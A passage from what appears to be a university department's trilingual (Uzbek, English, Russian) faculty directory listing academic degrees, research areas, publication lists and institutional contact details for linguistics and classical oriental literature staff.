- Лингвистическое исследование речи узбекских детей дошкольного возраста. Филол.наук.ном. дисс...-Ташкент, 2004;

- Психолингвистические особенности детской речи. Монография. -Ташкент: ТДПУ, 2012. -Б. 116;

- «Современный узбекский литературный язык». Фонетика. Фонология. Орфография. (Лабораторная работа)/5111200-Узбекский язык и литература для сферы образования. Методическое пособие. -Ташкент: ТДПУ, 2016;- - «Современный узбекский литературный язык» Лексикология. Фразеология. Лексикография. 5111200-Узбекский язык и литература для образования. Методическое руководство. -Ташкент: ТДПУ, 2016;

- Аудиокнига (на основе методического указания М.Гурбановой «Требования к написанию магистерской диссертации по специальности Узбекский язык и литература»). -Ташкент: Студия звукозаписи Афруз, 2015. 140 мб. (в соавторстве);

- «Современный узбекский литературный язык» Морфемика. Словообразование. Морфология. (Лабораторная работа)/5111200-Узбекский язык и литература для сферы образования. Методическое руководство. -Ташкент: ТДПУ, 2016;

- «Современный узбекский литературный язык». Фонетика. Фонология. Орфография. 5120100- Филология и преподавание языка (узбекский язык) для сферы образования (Практикум). Учебное пособие. -Ташкент: ТДПУ, 2018;

- «Современный узбекский литературный язык» Лексикология. Фразеология. Лексикография. 5120100-Филология и преподавание языков (узбекский язык) по сфере образования. - Учебное пособие. -Ташкент: ТДПУ, 2018;

- «Современный узбекский литературный язык» Лексикология. Фразеология. Лексикография. 5120100- Филология и преподавание языка (узбекский язык) для сферы образования (Практикум). Учебное пособие. -Ташкент: ТДПУ, 2018;

- Методические указания по организации самостоятельного обучения по предмету поступления на специальность. Методическое руководство. -Ташкент: ТДО'ТАУ, 2018.

- Использование узбекского языка в сферах. (5210200-Психология. Для студентов факультета социопсихологии религии). Учебник. -Ташкент: Полиграф Заман, 2022.

- Использование узбекского языка в сферах. (для студентов по направлению 60220200-Исламоведение). Учебник. -Ташкент: Полиграф Заман, 2023.

-Лингвистические особенности речи узбекских детей дошкольного возраста. Монография. -Ташкент: Полиграф Заман, 2023.

Ссылка на научные работы: https://scholar.google.com/citations?user=Tb5BzhIAAAAJ&hl=ru

 

Адрес электронной почты: nasibatashkent@mail.ru 

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

 F.I.SH.: Sagdullayeva Dilfuza Karimullayevna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi dotsenti v.b.

Ilmiy darajasi: filologiya fanlari bo‘yicha falsafa doktori (PhD)

Ilmiy unvoni: dotsent v.b.

Ilmiy tadqiqot yo‘nalishlari: Lingvistika (arab tili), mumtoz sharq adabiyoti va manbashunoslik

Chet tillarni bilishi: arab, rus va ingliz tillari

Asosiy ilmiy ishlari:

PhD. diss. mavzusi: «Qisasi Rabg‘uziy» asaridagi arabiy jumla va o‘zlashmalarning struktur – semantik tadqiqi». – T., 2021.

1.  Sagdullaeva D.K. The lexical groups of Arabic loanwords used in the «Qisasi Rabguzi» // Islom ziyosi. – Toshkent, 2018. – № 4. – B. 39-44 (10.00.00; № 7), (24.00.00; № 17).

2.  Sagdullayeva D.K. Rabg‘uziyning «Sulaymon bin Dovud alayhi-s-salom qissasi»dagi arabiy o‘zlashmalarning morfologik xususiyatlari // Buxoro davlat universiteti ilmiy axboroti. – Buxoro, 2019. – № 2. – B. 84-89 (10.00.00; № 1).

3. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan sintaktik vositalar // Imom Buxoriy saboqlari. – Samarqand, 2019. – № 4. – B. 113-115 (24.00.02; № 13).

4. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy o‘zlashmalarning tematik tasnifi // O‘zMU xabarlari. – Toshkent, 2019. –

№ 1/1. – B. 168-174 (10.00.00; № 15), (24.00.00; № 18).

5. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabiy birikmalarning sintaktik tahlili // Islom ziyosi. –Toshkent, 2020. – № 1. – B. 177-184 (10.00.00; № 7), (24.00.00; № 17).

6. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida keltirilgan tarixiy shaxslar va islom ulamolari xususida // Islom tafakkuri. – Toshkent, 2020. – № 2. – B. 106-109 (24.00.00; № 17).

7. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi forsiy elementlar yordamida hosil bo‘lgan arabiy o‘zlashmalar // Xorijiy filologiya: til, adabiyot, ta’lim ilmiy jurnali. – Samarqand, 2020. – № 2. – B. 112-115 (10.00.00; № 10).

8. Sagdullaeva D.K. The methods of meaning transfer of Arabic loanwords in «Qisasi Rabguzi» // ACADEMICIA: An International Multidisciplinary Research Journal https://saarj.com. e-ISSN:2249-7137 India Vol. 10, Issue 11, November 2020. – P. 2174-2179 (Impact Factor: SJIF 2020 = 7.13; № 23).

9. Sagdullaeva D.K. Methodology for studying the verses of the Holy Qur`an in «Qisasi Rabguzi». Turkic online journal of Qualitative Inquiry (TOJQI).Volume 6, July 2021. – P. 6683-6688 (https://www.scopus.com/sourceid/21101019739).

10. Сагдуллаева Д.К. О денотативной систематизации некоторых слов арабского происхождения в тюркоязычном произведении «Кисаси Рабгузи» // Языки и культуры народов России и мира. Материалы докладов I международной научной конференции. – Махачкала, 2019. – C. 353-358.

11. Сагдуллаева Д.К. Использование некоторых квазипричастий арабского происхождения в произведение «Кисаси Рабгузи» // Monografia pokonferensyjna. Science, research, development. № 25. – Berlin, 2020. – С. 100-102.

12. Sagdullayeva D.K. «Qisasi Rabg‘uziy»  asaridagi oyatlarning nasriy matnda qo‘llash xususiyatlari // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 160-161.

13. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy hikmatlar // Ona tili – millat ko‘zgusi. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 357-360.

14. Sagdullaeva D.K. The morphological peculiarities of Arabic loanwords in «The stories of prophets» by Rabguzi // International scientific journal. – Philadelphia, USA issue 09, volume 77 published 29.09.2019. – P. 138-141 (Impact Factor: ISJI 2019 = 7,716).

15. Sagdullaeva D.K. The classification and definition of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy// Obщyestvennыye i gumanitarnыye nauki. Materialы dokladov 84-y nauchno-texnicheskoy mejdunarodnoy konferensii. – Minsk, 2020. – S. 383-386.

16. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida islom tarixiy shaxslariga oid ba’zi antroponimlar // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2019. – B. 111-112.

17. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida iqtibos san’atining qo‘llanilishi // Yosh olimlarning ilmiy maqolalari to‘plami. – Toshkent, 2019. – B. 206-213.

18. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy sifatlovchi aniqlovchili birikmalar tahlili // O‘zbek mumtoz adabiyotini o‘rganishning nazariy va manbaviy asoslari. Respublika ilmiy-amaliy konferensiya materiallari. – Toshkent, 2019. – B. 221-225.

19. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida  turkiy fe’l hosil qilishda qo‘llangan arabcha masdarlar // Tarjima va madaniyat: muammolar, yechimlar, stragetiyalar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 152-156.

20. Sagdullayeva D.K. «Qisasi Rabg‘uziy» va «Tarixi anbiyo va hukamo» asarlarida keltirilgan oyatlar tahlili // O‘zbek filologiyasining dolzarb muammolari: talqin va tahlillar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Jizzax, 2020. – B. 118-120.

21. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida turkiy fe’l yasashda qo‘llangan arabiy o‘zlashmalar // Ubaydulla Uvatov – manbashunoslik va hadisshunoslik darg‘asi. Respublika ilmiy-amaliy konferensiyasi materiallari to‘plami. – Toshkent, 2021. – B. 160-165.

22. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabcha leksema-larning turkiy tildagi talqini xususida. Islom sivilizatsiyasi rivojida allomalar merosining o‘rni. Yosh olimlar III ilmiy-amaliy to‘plami. – Toshkent, 2021. – B. 34-37.

23. Sagdullayeva D.K. Linguoculturology as a new trend in linguistic study. Intellektual salohiyat – taraqqiyot mezoni. Ilmiy maqolalar to‘plami. – Toshkent, 2022. – B. 399- 402.

24. Sagdullaeva D.K. The thematical classification of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy // Web of scientist: international scientific journal research journal. – Indonesia. ISSN: 2776-0979, Volume 3, Issue 1, Jan., 2022. – P. 901-904 (Impact Factor: 7.565) va boshqalar.

Ilmiy ishlari havolasi:

 https://scholar.google.com/citations?user=TYRtteMAAAAJ&hl=ru

Elektron manzili: d.sagdullayeva@iiau.uz

Ishxona telefon raqami: +998 71 244 95 98 

INGLIZ TILIDA

Full Name: Sagdullayeva Dilfuza Karimullayevna

Academic degree: Doctor of Philosophy in Philological Sciences

Academic title: acting assistant professor

Research fields: linguistics (arabic language), classical oriental language and sourse study.

Foreign language skills: Arabic, Russian and English

Main scientific works:

           PhD. diss. topic: Structural-semantic study of Arabic sentences and borrowings in the work of “Qisasi Rabguzi”. – T., 2021.

1.  Sagdullaeva D.K. The lexical groups of Arabic loanwords used in the «Qisasi Rabguzi» // Islom ziyosi. – Toshkent, 2018. – № 4. – B. 39-44 (10.00.00; № 7), (24.00.00; № 17).

2.  Sagdullayeva D.K. Rabg‘uziyning «Sulaymon bin Dovud alayhi-s-salom qissasi»dagi arabiy o‘zlashmalarning morfologik xususiyatlari // Buxoro davlat universiteti ilmiy axboroti. – Buxoro, 2019. – № 2. – B. 84-89 (10.00.00; № 1).

3. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan sintaktik vositalar // Imom Buxoriy saboqlari. – Samarqand, 2019. – № 4. – B. 113-115 (24.00.02; № 13).

4. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy o‘zlashmalarning tematik tasnifi // O‘zMU xabarlari. – Toshkent, 2019. –

№ 1/1. – B. 168-174 (10.00.00; № 15), (24.00.00; № 18).

5. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabiy birikmalarning sintaktik tahlili // Islom ziyosi. –Toshkent, 2020. – № 1. – B. 177-184 (10.00.00; № 7), (24.00.00; № 17).

6. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida keltirilgan tarixiy shaxslar va islom ulamolari xususida // Islom tafakkuri. – Toshkent, 2020. – № 2. – B. 106-109 (24.00.00; № 17).

7. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi forsiy elementlar yordamida hosil bo‘lgan arabiy o‘zlashmalar // Xorijiy filologiya: til, adabiyot, ta’lim ilmiy jurnali. – Samarqand, 2020. – № 2. – B. 112-115 (10.00.00; № 10).

8. Sagdullaeva D.K. The methods of meaning transfer of Arabic loanwords in «Qisasi Rabguzi» // ACADEMICIA: An International Multidisciplinary Research Journal https://saarj.com. e-ISSN:2249-7137 India Vol. 10, Issue 11, November 2020. – P. 2174-2179 (Impact Factor: SJIF 2020 = 7.13; № 23).

9. Sagdullaeva D.K. Methodology for studying the verses of the Holy Qur`an in «Qisasi Rabguzi». Turkic online journal of Qualitative Inquiry (TOJQI).Volume 6, July 2021. – P. 6683-6688 (https://www.scopus.com/sourceid/21101019739).

10. Сагдуллаева Д.К. О денотативной систематизации некоторых слов арабского происхождения в тюркоязычном произведении «Кисаси Рабгузи» // Языки и культуры народов России и мира. Материалы докладов I международной научной конференции. – Махачкала, 2019. – C. 353-358.

11. Сагдуллаева Д.К. Использование некоторых квазипричастий арабского происхождения в произведение «Кисаси Рабгузи» // Monografia pokonferensyjna. Science, research, development. № 25. – Berlin, 2020. – С. 100-102.

12. Sagdullayeva D.K. «Qisasi Rabg‘uziy»  asaridagi oyatlarning nasriy matnda qo‘llash xususiyatlari // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 160-161.

13. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy hikmatlar // Ona tili – millat ko‘zgusi. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 357-360.

14. Sagdullaeva D.K. The morphological peculiarities of Arabic loanwords in «The stories of prophets» by Rabguzi // International scientific journal. – Philadelphia, USA issue 09, volume 77 published 29.09.2019. – P. 138-141 (Impact Factor: ISJI 2019 = 7,716).

15. Sagdullaeva D.K. The classification and definition of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy// Obщyestvennыye i gumanitarnыye nauki. Materialы dokladov 84-y nauchno-texnicheskoy mejdunarodnoy konferensii. – Minsk, 2020. – S. 383-386.

16. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida islom tarixiy shaxslariga oid ba’zi antroponimlar // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2019. – B. 111-112.

17. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida iqtibos san’atining qo‘llanilishi // Yosh olimlarning ilmiy maqolalari to‘plami. – Toshkent, 2019. – B. 206-213.

18. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy sifatlovchi aniqlovchili birikmalar tahlili // O‘zbek mumtoz adabiyotini o‘rganishning nazariy va manbaviy asoslari. Respublika ilmiy-amaliy konferensiya materiallari. – Toshkent, 2019. – B. 221-225.

19. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida  turkiy fe’l hosil qilishda qo‘llangan arabcha masdarlar // Tarjima va madaniyat: muammolar, yechimlar, stragetiyalar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 152-156.

20. Sagdullayeva D.K. «Qisasi Rabg‘uziy» va «Tarixi anbiyo va hukamo» asarlarida keltirilgan oyatlar tahlili // O‘zbek filologiyasining dolzarb muammolari: talqin va tahlillar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Jizzax, 2020. – B. 118-120.

21. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida turkiy fe’l yasashda qo‘llangan arabiy o‘zlashmalar // Ubaydulla Uvatov – manbashunoslik va hadisshunoslik darg‘asi. Respublika ilmiy-amaliy konferensiyasi materiallari to‘plami. – Toshkent, 2021. – B. 160-165.

22. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabcha leksema-larning turkiy tildagi talqini xususida. Islom sivilizatsiyasi rivojida allomalar merosining o‘rni. Yosh olimlar III ilmiy-amaliy to‘plami. – Toshkent, 2021. – B. 34-37.

23. Sagdullayeva D.K. Linguoculturology as a new trend in linguistic study. Intellektual salohiyat – taraqqiyot mezoni. Ilmiy maqolalar to‘plami. – Toshkent, 2022. – B. 399- 402.

24. Sagdullaeva D.K. The thematical classification of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy // Web of scientist: international scientific journal research journal. – Indonesia. ISSN: 2776-0979, Volume 3, Issue 1, Jan., 2022. – P. 901-904 (Impact Factor: 7.565) and etc.

Scientific works link: https://scholar.google.com/citations? user=TYRtteMAAAAJ&hl=ru

Email address: d.sagdullayeva@iiau.uz

Office phone number: +998 71 244 95 98 

RUS TILIDA

 ФИО: Сагдуллаева Дилфуз Каримуллаевна

Ученая степень: доктор философии по филологическим наукам (PhD)

Ученое звание: и.о. доцента

Области научных исследований: Лингвистика (арабский язык), классическая восточная литература и источниковедение.

Знание иностранных языков: арабский, русский и английский языки

Основные научные труды:

1.  Sagdullaeva D.K. The lexical groups of Arabic loanwords used in the «Qisasi Rabguzi» // Islom ziyosi. – Toshkent, 2018. – № 4. – B. 39-44 (10.00.00; № 7), (24.00.00; № 17).

2.  Sagdullayeva D.K. Rabg‘uziyning «Sulaymon bin Dovud alayhi-s-salom qissasi»dagi arabiy o‘zlashmalarning morfologik xususiyatlari // Buxoro davlat universiteti ilmiy axboroti. – Buxoro, 2019. – № 2. – B. 84-89 (10.00.00; № 1).

3. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan sintaktik vositalar // Imom Buxoriy saboqlari. – Samarqand, 2019. – № 4. – B. 113-115 (24.00.02; № 13).

4. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy o‘zlashmalarning tematik tasnifi // O‘zMU xabarlari. – Toshkent, 2019. –

№ 1/1. – B. 168-174 (10.00.00; № 15), (24.00.00; № 18).

5. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabiy birikmalarning sintaktik tahlili // Islom ziyosi. –Toshkent, 2020. – № 1. – B. 177-184 (10.00.00; № 7), (24.00.00; № 17).

6. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida keltirilgan tarixiy shaxslar va islom ulamolari xususida // Islom tafakkuri. – Toshkent, 2020. – № 2. – B. 106-109 (24.00.00; № 17).

7. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi forsiy elementlar yordamida hosil bo‘lgan arabiy o‘zlashmalar // Xorijiy filologiya: til, adabiyot, ta’lim ilmiy jurnali. – Samarqand, 2020. – № 2. – B. 112-115 (10.00.00; № 10).

8. Sagdullaeva D.K. The methods of meaning transfer of Arabic loanwords in «Qisasi Rabguzi» // ACADEMICIA: An International Multidisciplinary Research Journal https://saarj.com. e-ISSN:2249-7137 India Vol. 10, Issue 11, November 2020. – P. 2174-2179 (Impact Factor: SJIF 2020 = 7.13; № 23).

9. Sagdullaeva D.K. Methodology for studying the verses of the Holy Qur`an in «Qisasi Rabguzi». Turkic online journal of Qualitative Inquiry (TOJQI).Volume 6, July 2021. – P. 6683-6688 (https://www.scopus.com/sourceid/21101019739).

10. Сагдуллаева Д.К. О денотативной систематизации некоторых слов арабского происхождения в тюркоязычном произведении «Кисаси Рабгузи» // Языки и культуры народов России и мира. Материалы докладов I международной научной конференции. – Махачкала, 2019. – C. 353-358.

11. Сагдуллаева Д.К. Использование некоторых квазипричастий арабского происхождения в произведение «Кисаси Рабгузи» // Monografia pokonferensyjna. Science, research, development. № 25. – Berlin, 2020. – С. 100-102.

12. Sagdullayeva D.K. «Qisasi Rabg‘uziy»  asaridagi oyatlarning nasriy matnda qo‘llash xususiyatlari // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 160-161.

13. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy hikmatlar // Ona tili – millat ko‘zgusi. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 357-360.

14. Sagdullaeva D.K. The morphological peculiarities of Arabic loanwords in «The stories of prophets» by Rabguzi // International scientific journal. – Philadelphia, USA issue 09, volume 77 published 29.09.2019. – P. 138-141 (Impact Factor: ISJI 2019 = 7,716).

15. Sagdullaeva D.K. The classification and definition of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy// Obщyestvennыye i gumanitarnыye nauki. Materialы dokladov 84-y nauchno-texnicheskoy mejdunarodnoy konferensii. – Minsk, 2020. – S. 383-386.

16. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida islom tarixiy shaxslariga oid ba’zi antroponimlar // Dinshunoslikning dolzarb muammolari. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2019. – B. 111-112.

17. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida iqtibos san’atining qo‘llanilishi // Yosh olimlarning ilmiy maqolalari to‘plami. – Toshkent, 2019. – B. 206-213.

18. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida qo‘llangan arabiy sifatlovchi aniqlovchili birikmalar tahlili // O‘zbek mumtoz adabiyotini o‘rganishning nazariy va manbaviy asoslari. Respublika ilmiy-amaliy konferensiya materiallari. – Toshkent, 2019. – B. 221-225.

19. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida  turkiy fe’l hosil qilishda qo‘llangan arabcha masdarlar // Tarjima va madaniyat: muammolar, yechimlar, stragetiyalar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Toshkent, 2020. – B. 152-156.

20. Sagdullayeva D.K. «Qisasi Rabg‘uziy» va «Tarixi anbiyo va hukamo» asarlarida keltirilgan oyatlar tahlili // O‘zbek filologiyasining dolzarb muammolari: talqin va tahlillar. Respublika ilmiy-amaliy konferensiyasi materiallari. – Jizzax, 2020. – B. 118-120.

21. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asarida turkiy fe’l yasashda qo‘llangan arabiy o‘zlashmalar // Ubaydulla Uvatov – manbashunoslik va hadisshunoslik darg‘asi. Respublika ilmiy-amaliy konferensiyasi materiallari to‘plami. – Toshkent, 2021. – B. 160-165.

22. Sagdullayeva D.K. «Qisasi Rabg‘uziy» asaridagi arabcha leksema-larning turkiy tildagi talqini xususida. Islom sivilizatsiyasi rivojida allomalar merosining o‘rni. Yosh olimlar III ilmiy-amaliy to‘plami. – Toshkent, 2021. – B. 34-37.

23. Sagdullayeva D.K. Linguoculturology as a new trend in linguistic study. Intellektual salohiyat – taraqqiyot mezoni. Ilmiy maqolalar to‘plami. – Toshkent, 2022. – B. 399- 402.

24. Sagdullaeva D.K. The thematical classification of Arabic proper nouns used in the work of «The stories of prophets» by Rabghuzy // Web of scientist: international scientific journal research journal. – Indonesia. ISSN: 2776-0979, Volume 3, Issue 1, Jan., 2022. – P. 901-904 (Impact Factor: 7.565)  и др.

Ссылка на научные работы: https://scholar.google.com/citations? user=TYRtteMAAAAJ&hl=ru

Адрес электронной почты: d.sagdullayeva@iiau.uz

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

 F.I.Sh.: Lutfullayeva Durdona Esonovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi O‘zbek tili va mumtoz sharq adabiyoti kafedrasi.

Ilmiy darajasi: filologiya fanlari doktori.

Ilmiy unvoni: professor

Ilmiy tadqiqot yo‘nalishlari: assotsiativ tilshunoslik, pragmalingvistika, psixolingvistika, semantik sintaksis.

Chet tillarni bilishi: rus tili va nemis tili (lug‘at yordamida).

Asosiy ilmiy ishlari: 

– Тасдиқ гапларда шаклий-мазмуний ному­во­фиқлик.  - Тошкент: Фан, 1997. – 32 б.

– Гапни семантик-синтактик қолип­лаш­тириш асослари. (Монография) - Тошкент: Фан, 2005. – 138 б.

– «Гап қурилиш қолипи ва пропозитив струк­тураси ўр­та­­­сидаги муносабат. (Ўқув қўлланма)    - Тошкент: ТДПУ, 2008. – 155 б.

– Ўзбек тилининг амалий грамматикаси. Ўқув қўлланма. (ҳаммуаллифликда).  -Тошкент: Янги аср авлоди,  2010. – 163 б.

–  Тасдиқ гапларда имплицит негативлик. (Монография) - Тошкент: ТДПУ, 2015.  – 95 б.

–  Ассоциатив тилшунослик назарияси. Монография.    - Тошкент: Мериус, 2017.  – 140 б.

–  Лисоний зиддият ва нейтраллашув. Монография (ҳаммуаллифликда).  -Тошкент: Наврўз, 2018. – 110 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma.  (ҳаммуаллифликда).  - Toshkent: «Iqtisod-moliya», 2018.  – 280 б.

–  Oʻzbek tilining assotsiativ  lugʻati (milliy-madaniy birliklar).  (ҳаммуаллифликда).     - Toshkent: ««NAVOIY UNIVERSITETI» nashriyot-natbaa uyi. 2019.  – 380 б.

–  Мустақиллик даври расмий идоравий иш услуби тараққиёти. Монография. -Тошкент: Нодирабегим нашриёти, 2020. – 105 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma. (ҳаммуаллифликда).   - Toshkent: «Excellent Polygraphy-moliya», 2020.  – 280 б.

–  O‘zbek tilida nom yaratish texnologiyasi (tadbirkorlik faoliyati obyektlari, korxona, firma, iste’mol tovarlari nomlari) Монография. -(ҳаммуаллифликда).   Toshkent.  2021.  – 114 б.

–  Aнтропоцентрик тилшунослик: тушунча ва терминлар. Монография. (ҳаммуаллифликда).   Тошкент: “TUBO NASHR”, 2022. – 184 б.

Ilmiy ishlari havolasi: https://scholar.google.ru/citations?user =mjDL5QQAAAAJ&hl=ru

Elektron manzili: 1965ddd@mail.ru

Ishxona telefon raqami: +998 71 244 95 98

INGLIZ TILIDA

Full Name: Lutfullayeva Durdona Esonovna

Academic degree: Department of Uzbek language and classical oriental literature of the International Islamic Academy of Uzbekistan.

Academic degree: doktor of philological sciences.

Scientific title: professor.

Research fields: associative linguistics, pragmalinguistics, psycholinguistics, semantic syntax

Foreign language skills: Russian and German (using a dictionary).

Main scientific works: 

– Тасдиқ гапларда шаклий-мазмуний ному­во­фиқлик.  - Тошкент: Фан, 1997. – 32 б.

– Гапни семантик-синтактик қолип­лаш­тириш асослари. (Монография) - Тошкент: Фан, 2005. – 138 б.

– «Гап қурилиш қолипи ва пропозитив струк­тураси ўр­та­­­сидаги муносабат. (Ўқув қўлланма)    - Тошкент: ТДПУ, 2008. – 155 б.

– Ўзбек тилининг амалий грамматикаси. Ўқув қўлланма. (ҳаммуаллифликда).  -Тошкент: Янги аср авлоди,  2010. – 163 б.

–  Тасдиқ гапларда имплицит негативлик. (Монография) - Тошкент: ТДПУ, 2015.  – 95 б.

–  Ассоциатив тилшунослик назарияси. Монография.    - Тошкент: Мериус, 2017.  – 140 б.

–  Лисоний зиддият ва нейтраллашув. Монография (ҳаммуаллифликда).  -Тошкент: Наврўз, 2018. – 110 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma.  (ҳаммуаллифликда).   - Toshkent: «Iqtisod-moliya», 2018.  – 280 б.

–  Oʻzbek tilining assotsiativ  lugʻati (milliy-madaniy birliklar).  (ҳаммуаллифликда).     - Toshkent: ««NAVOIY UNIVERSITETI» nashriyot-natbaa uyi. 2019.  – 380 б.

–  Мустақиллик даври расмий идоравий иш услуби тараққиёти. Монография. -Тошкент: Нодирабегим нашриёти, 2020. – 105 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma. (ҳаммуаллифликда).   - Toshkent: «Excellent Polygraphy-moliya», 2020.  – 280 б.

–  O‘zbek tilida nom yaratish texnologiyasi (tadbirkorlik faoliyati obyektlari, korxona, firma, iste’mol tovarlari nomlari) Монография. -(ҳаммуаллифликда).   Toshkent.  2021.  – 114 б.

–  Aнтропоцентрик тилшунослик: тушунча ва терминлар. Монография. (ҳаммуаллифликда).   Тошкент: “TUBO NASHR”, 2022. – 184 б.

Research papers link:

https://scholar.google.ru/citations?user=mjDL5QQAAAAJ&hl=ru

Email address: 1965ddd@mail.ru

Office phone number: +998 71 244 95 98 

RUS TILIDA

 ФИО: Лутфуллаева Дурдона Эсоновна

Ученая степень: доктор филологических наук.

Ученое звание: профессор.

Области научных исследований: ассоциативная лингвистика, прагмалингвистика, психолингвистика, семантический синтаксис.

Знание иностранных языков: русский и немецкие языки.

Основные научные труды: 

– Тасдиқ гапларда шаклий-мазмуний ному­во­фиқлик. - Тошкент: Фан, 1997. – 32 б.

– Гапни семантик-синтактик қолип­лаш­тириш асослари. (Монография) - Тошкент: Фан, 2005. – 138 б.

– «Гап қурилиш қолипи ва пропозитив струк­тураси ўр­та­­­сидаги муносабат. (Ўқув қўлланма)    - Тошкент: ТДПУ, 2008. – 155 б.

– Ўзбек тилининг амалий грамматикаси. Ўқув қўлланма. (ҳаммуаллифликда).  -Тошкент: Янги аср авлоди,  2010. – 163 б.

–  Тасдиқ гапларда имплицит негативлик. (Монография) - Тошкент: ТДПУ, 2015.  – 95 б.

–  Ассоциатив тилшунослик назарияси. Монография.    - Тошкент: Мериус, 2017.  – 140 б.

–  Лисоний зиддият ва нейтраллашув. Монография (ҳаммуаллифликда).  -Тошкент: Наврўз, 2018. – 110 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma.  (ҳаммуаллифликда).   - Toshkent: «Iqtisod-moliya», 2018.  – 280 б.

–  Oʻzbek tilining assotsiativ  lugʻati (milliy-madaniy birliklar).  (ҳаммуаллифликда).     - Toshkent: ««NAVOIY UNIVERSITETI» nashriyot-natbaa uyi. 2019.  – 380 б.

–  Мустақиллик даври расмий идоравий иш услуби тараққиёти. Монография. -Тошкент: Нодирабегим нашриёти, 2020. – 105 б.

–  “Hozirgi oʻzbek adabiy тili”. O’quv qo’llanma. (ҳаммуаллифликда).   - Toshkent: «Excellent Polygraphy-moliya», 2020.  – 280 б.

–  O‘zbek tilida nom yaratish texnologiyasi (tadbirkorlik faoliyati obyektlari, korxona, firma, iste’mol tovarlari nomlari) Монография. -(ҳаммуаллифликда).   Toshkent.  2021.  – 114 б.

–  Aнтропоцентрик тилшунослик: тушунча ва терминлар. Монография. (ҳаммуаллифликда).   Тошкент: “TUBO NASHR”, 2022. – 184 б.

Ссылка на научные работы: https://scholar.google.ru/citations?user =mjDL5QQAAAAJ&hl=ru

Адрес электронной почты: 1965ddd@mail.

O‘ZBEK TILIDA

F.I.Sh.: Jalolova Sayyora Mirxaydarovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi O‘zbek tili va mumtoz sharq adabiyoti kafedrasi katta o’qituvchisi.

Ilmiy tadqiqot yo‘nalishlari: rus tilint o’qitish metodikasi

Chet tillarni bilishi: rus tili va ingliz tili (lug‘at yordamida).

Asosiy ilmiy ishlari: 

I бўлим (I чaсть; I part) Махаллий ОАК нашрлари

1. Джалалова С.М. «Взаимодействие студента и преподавателя как основа филологического образования». Xorijiy filologiya (Тil. Adabiyot. Ta’lim) Samarqand. 4/1 (69) 2017. (104-108)

2. Учебный перевод фразеологизмов как методический прием на занятиях русского языка. Сўз санъати халқаро журнали ISSN 2181-9297 Doi Journal 10.26739/2181-9297. Т. 2019йил. № 6. 108-113.

